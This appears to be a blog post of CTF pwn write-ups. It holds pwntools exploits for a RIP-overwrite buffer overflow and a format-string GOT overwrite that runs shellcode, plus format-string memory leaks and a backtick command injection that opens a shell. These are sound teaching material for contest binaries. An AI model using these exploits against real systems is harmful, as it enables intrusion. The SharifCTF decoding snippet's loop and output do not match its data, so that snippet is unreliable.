Voting Machine 1 (watevrCTF 2019)

Simple Buffer overflow challenge where you have to overwrite RIP with the ‘super_secret_function'(method which prints flag).

Idea to solve the challenge:

[*] Offset to reach RIP is 10bytes and then overwrite RIP with ‘0x400807’ to print the flag.

Exploit:

from pwn import *

super_secret_function = 0x400807
payload = "A"*10
payload += p64(super_secret_function)
print payload

➜ pwn python payload.py| nc 13.48.67.196 50000

Flag: watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}

HackIM-2017 (Exploitation – 200)

A ELF 32-bit LSB executable binary was given which is not stripped.
It is type of menu driven program where you can Inesrt, List, Search, Delete, and Exit form Book Manager.
If you go through the search program you will find the “Format string vulnerability” and the permission of the binary are

CANARY    : ENABLED
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

As NX is disabled so we can execute shellcode. So here is the idea on how to solve the challenge
[*] Leak any of the address form heap through format string vulnerability
[*] Write shell code through insert function
[*] Over write got of strchr with the leaked heap address using format string vulnerability

Here is the exploit

from pwn import *
import format

got_strchr = 0x804b038
shellcode = asm(shellcraft.linux.sh())

def insert(name,idx=0):
        p.sendline("1")
        p.recvuntil("book name: ")
        p.sendline(name)
        p.sendlineafter("book id: ",str(idx))

def search(query,choice=False):
        p.sendline("3")
        p.recvuntil("query: ")
        p.sendline(query)
        p.recvuntil("Searching with: ")
        if choice == True:
                addr = int(p.recvline().strip(),16)
                p.recvline()
                return addr

#p = process("level1.bin")
p = remote("34.198.96.6",9001)
insert(shellcode)
heap = search('0x%7$x',True)
log.success("{}".format(hex(heap)))
payload = format.makepayload(heap,got_strchr,'11')
search(payload)
p.interactive()

SharifCTF 7 pwn-50 (Guess)

In this challenge binary was not given and you are supposed connect and guess through net cat connection.

I was just brute-forcing and from the offset 135 i started getting flag

%136$lx
5443666972616853
Hidden string is at somewhere.
%137$lx
3832346435617b46
Hidden string is at somewhere.
%138$lx
Hidden string is at somewhere.
6237636363323336
%139$lx
Hidden string is at somewhere.
6136633735336466
%140$lx
Hidden string is at somewhere.
3561383761383231
%141$lx
Hidden string is at somewhere.
7fc7007d6338

You will get flag through this script

>>> a = ["5443666972616853","3832346435617b46","6237636363323336","6136633735336466","3561383761383231","7fc7007d6338"]
>>> for i in range(1,7):
...   b = a[i].decode('hex')
...   print b[::-1]
... 
F{a5d428
632ccc7b
fd357c6a
128a78a5
8c}

MIC Check (Codegate CTF-2016)

This is a challenge from Codegate CTF and one of the simple challenge that i have solved. As source code was given it became more easy to analyze. There was a simple command Injection but most of the characters were blocked. By looking at this page i got the idea. There was one character that was not blocked, which is ‘`'(tic). So i made use of that and got that shell. This is the way i have solved the challenge.

mic@ubuntu:~$ ./miccheck
input path :`sh`
cat mic.flag.txt
/bin/ls: cannot access /dev/let: No such file or directory
/bin/ls: cannot access the: No such file or directory
/bin/ls: cannot access hacking: No such file or directory
/bin/ls: cannot access begins: No such file or directory

Flag is “let the hacking begins”

Even thought after thinking a lot i didn’t understand exactly, how i got it done . If any one get know, how it worked please comment that below